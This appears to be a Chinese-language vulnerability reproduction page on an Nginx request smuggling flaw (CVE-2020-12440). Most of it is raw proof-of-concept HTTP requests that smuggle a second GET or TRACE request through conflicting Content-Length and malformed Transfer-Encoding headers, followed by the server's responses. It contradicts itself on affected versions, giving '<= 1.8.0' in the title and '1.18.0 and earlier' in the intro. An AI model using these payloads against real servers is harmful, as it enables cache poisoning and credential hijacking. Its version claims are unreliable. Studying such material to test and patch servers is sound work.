(CVE-2020-12440)Nginx \<= 1.8.0 请求走私¶
一、漏洞简介¶
Nginx 1.18.0及之前版本中存在安全漏洞。攻击者可利用该漏洞进行缓存投毒,劫持凭证或绕过安全保护。
二、漏洞影响¶
Nginx \<= 1.8.0
三、复现过程¶
Nginx<=1.8.0请求走私/media/rId24.jpg)
Request¶
GET /test.html HTTP/1.1 Host: www.0-sec.org Content-Length: 2 GET /poc.html HTTP/1.1 Host: www.0-sec.org Content-Length: 15
Response¶
HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 01 May 2020 18:28:44 GMT Content-Type: text/html Content-Length: 33 Last-Modified: Thu, 30 Apr 2020 14:36:32 GMT Connection: keep-alive ETag: "5eaae270-21" Accept-Ranges: bytes <html><h1>Test Page!</h1></html> HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 01 May 2020 18:28:44 GMT Content-Type: text/html Content-Length: 15 Last-Modified: Thu, 30 Apr 2020 14:35:41 GMT Connection: keep-alive ETag: "5eaae23d-f" Accept-Ranges: bytes NGINX PoC File
其他例子¶
Request(200 OK + 405 Method Not Allowed)¶
GET / HTTP/1.1 Host: www.0-sec.org Content-Length: 4 Transfer-Encoding : chunked 46 TRACE / HTTP/1.1 Host:www.0-sec.org Content-Length:15 kk 0s
Response(200 OK + 405 Method Not Allowed)¶
HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 21 Apr 2020 16:28:12 GMT Content-Type: text/html Content-Length: 612 Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT Connection: keep-alive ETag: "5e9f1a9b-264" Accept-Ranges: bytes <!DOCTYPE html> <html> <head> <title>Welcome to nginx!</title> <style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; } </style> </head> <body> <h1>Welcome to nginx!</h1> <p>If you see this page, the nginx web server is successfully installed and working. Further configuration is required.</p> <p>For online documentation and support please refer to <a href="http://nginx.org/">nginx.org</a>.<br /> Commercial support is available at <a href="http://nginx.com/">nginx.com</a>.</p> <p><em>Thank you for using nginx.</em></p> </body> </html> HTTP/1.1 405 Not Allowed Server: nginx/1.18.0 Date: Tue, 21 Apr 2020 16:28:12 GMT Content-Type: text/html Content-Length: 157 Connection: close <html> <head><title>405 Not Allowed</title></head> <body> <center><h1>405 Not Allowed</h1></center> <hr><center>nginx/1.18.0</center> </body> </html>
Request(200 OK + 404 Not Found)¶
GET / HTTP/1.1 Host: www.0-sec.org Content-Length: 4 Transfer-Encoding : chunked 46 GET /404 HTTP/1.1 Host:www.0-sec.org Content-Length:15 kk 0s
Response(200 OK + 404 Not Found)¶
HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 21 Apr 2020 16:23:52 GMT Content-Type: text/html Content-Length: 612 Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT Connection: keep-alive ETag: "5e9f1a9b-264" Accept-Ranges: bytes <!DOCTYPE html> <html> <head> <title>Welcome to nginx!</title> <style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; } </style> </head> <body> <h1>Welcome to nginx!</h1> <p>If you see this page, the nginx web server is successfully installed and working. Further configuration is required.</p> <p>For online documentation and support please refer to <a href="http://nginx.org/">nginx.org</a>.<br /> Commercial support is available at <a href="http://nginx.com/">nginx.com</a>.</p> <p><em>Thank you for using nginx.</em></p> </body> </html> HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 21 Apr 2020 16:23:52 GMT Content-Type: text/html Content-Length: 153 Connection: keep-alive <html> <head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.18.0</center> </body> </html>